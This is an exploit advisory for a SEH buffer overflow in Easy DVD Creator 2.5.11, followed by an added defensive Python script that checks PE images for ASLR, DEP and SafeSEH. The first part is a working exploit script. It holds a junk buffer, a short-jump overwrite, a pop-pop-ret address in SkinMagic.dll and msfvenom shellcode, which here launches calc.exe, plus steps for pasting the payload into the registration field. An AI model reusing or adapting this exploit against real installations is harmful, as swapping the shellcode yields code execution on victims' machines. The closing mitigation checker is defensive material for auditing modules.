Easy DVD Creator 2.5.11 Buffer Overflow
Source: spiritedwolf@protonmail.com Author: Singh Published: 2018-08-02
#!/usr/bin/env python

# Exploit Title     : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)  
# Discovery by      : Shubham Singh
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]
# Email             : spiritedwolf@protonmail.com
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit 
# Discovery Date    : 29/07/2018
# Software Link     : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version    : 2.5.11
# Tested on OS      : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
#                     Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
#                     In the third field, i.e. "Enter User Name", paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator popped up.
# Greetz            :  @FuzzySec @LiveOverflow @hexachordanu

buffer = "\x41" * 996
#Short Jump address
nseh = "\xeb\x06\x90\x90" 
#0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll)
seh= "\x59\x78\x03\x10"
#badchar \x00\x0a\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python
buf =  ""
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"

nops = "\x90" * 16

exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()
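
A defender-side check for the condition the SEH overwrite above relies on, namely a loaded module that the script's comment reports as "ASLR: False, SafeSEH: False" (SkinMagic.dll). This is an added example, not part of the original advisory: it reads a PE32 image's DllCharacteristics and load configuration directory and reports whether the image opts in to ASLR, DEP and SafeSEH. The names `audit_pe` and `build_sample` are hypothetical, and the sample images are constructed in memory so the check runs offline.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400

def u(fmt, data, off):  # unpack little-endian fields at a file offset
    return struct.unpack_from("<" + fmt, data, off)

def audit_pe(data):
    """Return which exploit mitigations a 32-bit PE image opts in to."""
    pe = u("I", data, 0x3C)[0] if data[:2] == b"MZ" and len(data) >= 0x40 else -1
    if pe < 0 or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect, opt_size, opt = u("H", data, pe + 6)[0], u("H", data, pe + 20)[0], pe + 24
    if u("H", data, opt)[0] != 0x10B:
        raise ValueError("SafeSEH only applies to PE32 (x86) images")
    flags = u("H", data, opt + 70)[0]              # DllCharacteristics
    # Data directory 10 is the load configuration, which holds the SafeSEH table.
    lc_rva = u("I", data, opt + 176)[0] if u("I", data, opt + 92)[0] > 10 else 0
    table = count = 0
    for i in range(nsect if lc_rva else 0):        # map the RVA to a file offset
        vsize, vaddr, rsize, raw = u("IIII", data, opt + opt_size + 40 * i + 8)
        if vaddr <= lc_rva < vaddr + max(vsize, rsize):
            lc = raw + lc_rva - vaddr
            if u("I", data, lc)[0] >= 72:          # older directories lack the fields
                table, count = u("II", data, lc + 64)
    return {"aslr": bool(flags & DYNAMIC_BASE), "dep": bool(flags & NX_COMPAT),
            "safeseh": bool(flags & NO_SEH) or (table != 0 and count > 0)}

def build_sample(flags, safeseh):
    """Constructed minimal PE32 headers plus one section, for this demo only."""
    img = bytearray(0x400)
    img[0:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)                  # e_lfanew
    struct.pack_into("<HH", img, 0x44, 0x14C, 1)             # i386, one section
    struct.pack_into("<H", img, 0x54, 224)                   # SizeOfOptionalHeader
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<H", img, opt + 70, flags)             # DllCharacteristics
    struct.pack_into("<I", img, opt + 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<IIII", img, opt + 224 + 8, 0x200, 0x1000, 0x200, 0x200)
    if safeseh:
        struct.pack_into("<II", img, opt + 176, 0x1000, 72)  # load config directory
        struct.pack_into("<I", img, 0x200, 72)               # directory Size field
        struct.pack_into("<II", img, 0x200 + 64, 0x10001100, 1)  # table VA, count
    return bytes(img)

if __name__ == "__main__":
    print(audit_pe(build_sample(0, False)))  # constructed image with no opt-ins
```

To audit an installed application, pass `audit_pe` the bytes of each DLL in its directory; any module that reports all three values as false is the kind of image the SEH technique above depends on.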


 